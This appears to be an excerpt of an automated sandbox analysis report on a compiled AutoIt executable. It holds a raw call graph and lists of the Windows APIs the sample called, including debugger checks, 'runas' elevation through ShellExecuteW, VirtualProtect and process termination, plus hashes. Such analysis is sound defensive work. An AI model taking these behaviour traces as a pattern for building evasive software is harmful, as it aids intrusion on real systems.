88196->88198 88354 40de40 88197->88354 88200 46790c 88198->88200 88367 40d200 52 API calls 2 library calls 88200->88367 88203 4679c7 GetLastError 88206 403cd0 VariantClear 88203->88206 88204 467a05 88207 467a2c 88204->88207 88208 467a4b 88204->88208 88205 467917 88205->88215 88368 4339fa GetFileAttributesW FindFirstFileW FindClose 88205->88368 88209 4679dc 88206->88209 88211 4115d7 52 API calls 88207->88211 88212 4115d7 52 API calls 88208->88212 88213 4679e6 88209->88213 88371 44ae3e 88209->88371 88217 467a31 88211->88217 88218 467a49 88212->88218 88221 408f40 VariantClear 88213->88221 88214 467928 88214->88215 88220 46792f 88214->88220 88215->88188 88216 467964 88215->88216 88216->88170 88374 436299 52 API calls 2 library calls 88217->88374 88225 408f40 VariantClear 88218->88225 88369 4335cd 56 API calls 3 library calls 88220->88369 88224 4679ed 88221->88224 88224->88170 88227 467a88 88225->88227 88226 467939 88226->88215 88228 408f40 VariantClear 88226->88228 88227->88170 88229 467947 88228->88229 88229->88215 88231 4115d7 52 API calls 88230->88231 88232 40de23 88231->88232 88233 40da20 CloseHandle 88232->88233 88234 40de2e 88233->88234 88234->88170 88236 45e198 88235->88236 88237 45e19c 88236->88237 88238 45e1b8 88236->88238 88239 408f40 VariantClear 88237->88239 88240 45e1cc 88238->88240 88241 45e1db FindClose 88238->88241 88242 45e1a4 88239->88242 88243 45e1d9 moneypunct 88240->88243 88244 44ae3e CloseHandle 88240->88244 88241->88243 88242->88170 88243->88170 88244->88243 88397 46e785 88245->88397 88247 46e92f 88247->88170 88301 4533eb 88248->88301 88251 4750ee 88254 408f40 VariantClear 88251->88254 88252 475129 88305 4646e0 88252->88305 88259 4750f5 88254->88259 88255 47515e 88256 475162 88255->88256 88294 47518e 88255->88294 88257 408f40 VariantClear 88256->88257 88288 475169 88257->88288 88258 475357 88260 475365 88258->88260 88261 4754ea 88258->88261 88259->88185 88339 44b3ac 57 API calls 88260->88339 88345 464812 92 API calls 88261->88345 88265 4754fc 88266 475374 88265->88266 88268 475508 88265->88268 88318 430d31 88266->88318 88267 4533eb 85 API calls 88267->88294 88269 408f40 VariantClear 88268->88269 88272 47550f 88269->88272 88272->88288 88273 475388 88325 4577e9 88273->88325 88275 47539e 88333 410cfc 88275->88333 88276 475480 88278 408f40 VariantClear 88276->88278 88278->88288 88280 4753d4 88341 40e830 53 API calls 88280->88341 88281 4753b8 88340 45e737 90 API calls 3 library calls 88281->88340 88284 4753c5 GetCurrentProcess TerminateProcess 88284->88280 88285 4753e3 88299 475406 88285->88299 88342 40cf00 53 API calls 88285->88342 88286 4754b5 88287 408f40 VariantClear 88286->88287 88287->88288 88288->88185 88290 475556 88290->88288 88295 47556e FreeLibrary 88290->88295 88291 4753f8 88343 46c43e 106 API calls 2 library calls 88291->88343 88294->88258 88294->88267 88294->88276 88294->88286 88294->88294 88337 436299 52 API calls 2 library calls 88294->88337 88338 463ad5 64 API calls __wcsicoll 88294->88338 88295->88288 88297 408e80 VariantClear 88297->88299 88299->88290 88299->88297 88300 408f40 VariantClear 88299->88300 88344 40cf00 53 API calls 88299->88344 88346 44b3ac 57 API calls 88299->88346 88347 46c43e 106 API calls 2 library calls 88299->88347 88300->88299 88302 453404 88301->88302 88303 4533f8 88301->88303 88302->88251 88302->88252 88303->88302 88348 4531b1 85 API calls 5 library calls 88303->88348 88349 4536f7 53 API calls 88305->88349 88307 4646fc 88350 4426cd 59 API calls _wcslen 88307->88350 88309 464711 88311 40bc70 52 API calls 88309->88311 88317 46474b 88309->88317 88312 46472c 88311->88312 88351 461465 52 API calls _memmove 88312->88351 88314 464741 88315 40c600 52 API calls 88314->88315 88315->88317 88316 464793 88316->88255 88317->88316 88352 463ad5 64 API calls __wcsicoll 88317->88352 88319 430db2 88318->88319 88320 430d54 88318->88320 88319->88273 88321 4115d7 52 API calls 88320->88321 88322 430d74 88321->88322 88323 430da9 88322->88323 88324 4115d7 52 API calls 88322->88324 88323->88273 88324->88322 88326 457a84 88325->88326 88332 45780c _strcat moneypunct _wcslen _wcscpy 88325->88332 88326->88275 88327 45340c 85 API calls 88327->88332 88328 443006 57 API calls 88328->88332 88330 4135bb 46 API calls _malloc 88330->88332 88331 40f6f0 54 API calls 88331->88332 88332->88326 88332->88327 88332->88328 88332->88330 88332->88331 88353 44b3ac 57 API calls 88332->88353 88335 410d11 88333->88335 88334 410da9 VirtualProtect 88336 410d77 88334->88336 88335->88334 88335->88336 88336->88280 88336->88281 88337->88294 88338->88294 88339->88266 88340->88284 88341->88285 88342->88291 88343->88299 88344->88299 88345->88265 88346->88299 88347->88299 88348->88302 88349->88307 88350->88309 88351->88314 88352->88316 88353->88332 88375 40da20 88354->88375 88356 40de4e 88379 40f110 88356->88379 88358 4264fa 88361 40de84 88388 40e080 SetFilePointerEx SetFilePointerEx 88361->88388 88363 40de8b 88389 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88363->88389 88365 40de90 88365->88203 88365->88204 88366->88191 88367->88205 88368->88214 88369->88226 88370->88192 88372 44ae4b moneypunct 88371->88372 88391 443fdf 88371->88391 88372->88213 88374->88218 88376 40da37 88375->88376 88377 40da29 88375->88377 88376->88377 88378 40da3c CloseHandle 88376->88378 88377->88356 88378->88356 88380 40f125 CreateFileW 88379->88380 88381 42630c 88379->88381 88383 40de74 88380->88383 88382 426311 CreateFileW 88381->88382 88381->88383 88382->88383 88384 426337 88382->88384 88383->88358 88387 40dea0 55 API calls moneypunct 88383->88387 88390 40df90 SetFilePointerEx SetFilePointerEx 88384->88390 88386 426342 88386->88383 88387->88361 88388->88363 88389->88365 88390->88386 88392 40da20 CloseHandle 88391->88392 88393 443feb 88392->88393 88396 4340db CloseHandle moneypunct 88393->88396 88395 444001 88395->88372 88396->88395 88398 46e7a2 88397->88398 88399 4115d7 52 API calls 88398->88399 88402 46e802 88398->88402 88400 46e7ad 88399->88400 88401 46e7b9 88400->88401 88445 40da60 53 API calls 88400->88445 88407 4533eb 85 API calls 88401->88407 88403 46e7e5 88402->88403 88410 46e82f 88402->88410 88404 408f40 VariantClear 88403->88404 88406 46e7ea 88404->88406 88406->88247 88408 46e7ca 88407->88408 88411 40de40 60 API calls 88408->88411 88409 46e8b5 88438 4680ed 88409->88438 88410->88409 88412 46e845 88410->88412 88413 46e7d7 88411->88413 88415 4533eb 85 API calls 88412->88415 88413->88410 88416 46e7db 88413->88416 88428 46e84b 88415->88428 88416->88403 88418 44ae3e CloseHandle 88416->88418 88417 46e87a 88446 4689f4 59 API calls 88417->88446 88418->88403 88419 46e8bb 88442 443fbe 88419->88442 88420 46e883 88423 4013c0 52 API calls 88420->88423 88425 46e88f 88423->88425 88426 40e0a0 52 API calls 88425->88426 88429 46e899 88426->88429 88427 408f40 VariantClear 88436 46e881 88427->88436 88428->88417 88428->88420 88447 40d200 52 API calls 2 library calls 88429->88447 88431 46e911 88431->88247 88432 46e8a5 88448 4689f4 59 API calls 88432->88448 88433 40da20 CloseHandle 88435 46e903 88433->88435 88437 44ae3e CloseHandle 88435->88437 88436->88431 88436->88433 88437->88431 88439 468100 88438->88439 88440 4680fa 88438->88440 88439->88419 88449 467ac4 55 API calls 2 library calls 88440->88449 88450 443e36 88442->88450 88444 443fd3 88444->88427 88444->88436 88445->88401 88446->88436 88447->88432 88448->88436 88449->88439 88453 443e19 88450->88453 88454 443e26 88453->88454 88455 443e32 WriteFile 88453->88455 88456 443db4 SetFilePointerEx SetFilePointerEx 88454->88456 88455->88444 88456->88455 88457->88006 88458->87928 88459->87973 88460->88037 88461->87973 88462->87973 88463->87947 88464->87969 88465->87938 88466->87942 88467->87948 88468->88000 88469->88000 88470->88000 88471->87961 88472->87929 88473->87966 88474->87994 88475->88015 88476->88015 88477->88006 88478->88020 88479->88032 88480->88027 88481->88035 88482->88040 88483->88040 88484->87929 88485->87933 88486 42d154 88490 480a8d 88486->88490 88488 42d161 88489 480a8d 194 API calls 88488->88489 88489->88488 88491 480ae4 88490->88491 88492 480b26 88490->88492 88494 480aeb 88491->88494 88495 480b15 88491->88495 88493 40bc70 52 API calls 88492->88493 88504 480b2e 88493->88504 88496 480aee 88494->88496 88497 480b04 88494->88497 88523 4805bf 194 API calls 88495->88523 88496->88492 88499 480af3 88496->88499 88522 47fea2 194 API calls __itow_s 88497->88522 88521 47f135 194 API calls 88499->88521 88501 40e0a0 52 API calls 88501->88504 88503 408f40 VariantClear 88506 481156 88503->88506 88504->88501 88507 480aff 88504->88507 88510 401980 53 API calls 88504->88510 88512 40c2c0 52 API calls 88504->88512 88513 408e80 VariantClear 88504->88513 88514 480ff5 88504->88514 88515 40e710 53 API calls 88504->88515 88516 40a780 194 API calls 88504->88516 88524 45377f 52 API calls 88504->88524 88525 45e951 53 API calls 88504->88525 88526 40e830 53 API calls 88504->88526 88527 47925f 53 API calls 88504->88527 88528 47fcff 194 API calls 88504->88528 88508 408f40 VariantClear 88506->88508 88507->88503 88509 48115e 88508->88509 88509->88488 88510->88504 88512->88504 88513->88504 88529 45e737 90 API calls 3 library calls 88514->88529 88515->88504 88516->88504 88521->88507 88522->88507 88523->88507 88524->88504 88525->88504 88526->88504 88527->88504 88528->88504 88529->88507 88530 42b14b 88537 40bc10 88530->88537 88532 42b159 88533 4096a0 331 API calls 88532->88533 88534 42b177 88533->88534 88548 44b92d VariantClear 88534->88548 88536 42bc5b 88538 40bc24 88537->88538 88539 40bc17 88537->88539 88541 40bc2a 88538->88541 88542 40bc3c 88538->88542 88540 408e80 VariantClear 88539->88540 88543 40bc1f 88540->88543 88544 408e80 VariantClear 88541->88544 88545 4115d7 52 API calls 88542->88545 88543->88532 88546 40bc33 88544->88546 88547 40bc43 88545->88547 88546->88532 88547->88532 88548->88536 88549 425b2b 88554 40f000 88549->88554 88553 425b3a 88555 4115d7 52 API calls 88554->88555 88556 40f007 88555->88556 88557 4276ea 88556->88557 88563 40f030 88556->88563 88562 41130a 51 API calls __cinit 88562->88553 88564 40f039 88563->88564 88565 40f01a 88563->88565 88593 41130a 51 API calls __cinit 88564->88593 88567 40e500 88565->88567 88568 40bc70 52 API calls 88567->88568 88569 40e515 GetVersionExW 88568->88569 88570 402160 52 API calls 88569->88570 88571 40e557 88570->88571 88594 40e660 88571->88594 88575 427674 88581 4276c6 GetSystemInfo 88575->88581 88579 40e5e0 88582 4276d5 GetSystemInfo 88579->88582 88608 40efd0 88579->88608 88580 40e5cd GetCurrentProcess 88615 40ef20 LoadLibraryA GetProcAddress 88580->88615 88581->88582 88586 40e629 88612 40ef90 88586->88612 88589 40e641 FreeLibrary 88590 40e644 88589->88590 88591 40e653 FreeLibrary 88590->88591 88592 40e656 88590->88592 88591->88592 88592->88562 88593->88565 88595 40e667 88594->88595 88596 42761d 88595->88596 88597 40c600 52 API calls 88595->88597 88598 40e55c 88597->88598 88599 40e680 88598->88599 88600 40e687 88599->88600 88601 427616 88600->88601 88602 40c600 52 API calls 88600->88602 88603 40e566 88602->88603 88603->88575 88604 40ef60 88603->88604 88605 40e5c8 88604->88605 88606 40ef66 LoadLibraryA 88604->88606 88605->88579 88605->88580 88606->88605 88607 40ef77 GetProcAddress 88606->88607 88607->88605 88609 40e620 88608->88609 88610 40efd6 LoadLibraryA 88608->88610 88609->88581 88609->88586 88610->88609 88611 40efe7 GetProcAddress 88610->88611 88611->88609 88616 40efb0 LoadLibraryA GetProcAddress 88612->88616 88614 40e632 GetNativeSystemInfo 88614->88589 88614->88590 88615->88579 88616->88614 88617 425b5e 88622 40c7f0 88617->88622 88621 425b6d 88657 40db10 52 API calls 88622->88657 88624 40c82a 88658 410ab0 6 API calls 88624->88658 88626 40c86d 88627 40bc70 52 API calls 88626->88627 88628 40c877 88627->88628 88629 40bc70 52 API calls 88628->88629 88630 40c881 88629->88630 88631 40bc70 52 API calls 88630->88631 88632 40c88b 88631->88632 88633 40bc70 52 API calls 88632->88633 88634 40c8d1 88633->88634 88635 40bc70 52 API calls 88634->88635 88636 40c991 88635->88636 88659 40d2c0 52 API calls 88636->88659 88638 40c99b 88660 40d0d0 53 API calls 88638->88660 88640 40c9c1 88641 40bc70 52 API calls 88640->88641 88642 40c9cb 88641->88642 88661 40e310 53 API calls 88642->88661 88644 40ca28 88645 408f40 VariantClear 88644->88645 88646 40ca30 88645->88646 88647 408f40 VariantClear 88646->88647 88648 40ca38 GetStdHandle 88647->88648 88649 429630 88648->88649 88650 40ca87 88648->88650 88649->88650 88651 429639 88649->88651 88656 41130a 51 API calls __cinit 88650->88656 88662 4432c0 57 API calls 88651->88662 88653 429641 88663 44b6ab CreateThread 88653->88663 88655 42964f CloseHandle 88655->88650 88656->88621 88657->88624 88658->88626 88659->88638 88660->88640 88661->88644 88662->88653 88663->88655 88664 44b5cb 58 API calls 88663->88664 88665 425b6f 88670 40dc90 88665->88670 88669 425b7e 88671 40bc70 52 API calls 88670->88671 88672 40dd03 88671->88672 88678 40f210 88672->88678 88674 40dd96 88676 40ddb7 88674->88676 88681 40dc00 52 API calls 2 library calls 88674->88681 88677 41130a 51 API calls __cinit 88676->88677 88677->88669 88682 40f250 RegOpenKeyExW 88678->88682 88680 40f230 88680->88674 88681->88674 88683 425e17 88682->88683 88684 40f275 RegQueryValueExW 88682->88684 88683->88680 88685 40f2c3 RegCloseKey 88684->88685 88686 40f298 88684->88686 88685->88680 88687 40f2a9 RegCloseKey 88686->88687 88688 425e1d 88686->88688 88687->88680 88689 40de3f0 88703 40dc040 88689->88703 88691 40de485 88706 40de2e0 88691->88706 88705 40dc6cb 88703->88705 88709 40df4b0 GetPEB 88703->88709 88705->88691 88707 40de2e9 Sleep 88706->88707 88708 40de2f7 88707->88708 88709->88705

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00409D96
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004297E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2383988440-0
                                                                                                                                                                                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                                                                                                                Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                                                                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                                                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                • API String ID: 2495805114-3383388033
                                                                                                                                                                                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                                                                                                                Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1936 40e5ec-40e60c 1918->1936 1937 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1937 1938 4276c6-4276ca GetSystemInfo 1919->1938 1920->1919 1929 427698-4276a8 1920->1929 1921->1919 1925 427636-427640 1922->1925 1926 42762b-427631 1922->1926 1927 40e5a5-40e5ae 1923->1927 1928 427654-427657 1923->1928 1925->1918 1926->1918 1932 40e5b4 1927->1932 1933 427645-42764f 1927->1933 1928->1918 1931 42765d-42766f 1928->1931 1934 4276b0 1929->1934 1935 4276aa-4276ae 1929->1935 1931->1918 1932->1918 1933->1918 1934->1919 1935->1919 1939 40e612-40e623 call 40efd0 1936->1939 1940 4276d5-4276df GetSystemInfo 1936->1940 1937->1936 1947 40e5e8 1937->1947 1938->1940 1939->1938 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1939->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1936 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                                                                                                • String ID: 0SH
                                                                                                                                                                                                                • API String ID: 3363477735-851180471
                                                                                                                                                                                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                                                                                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
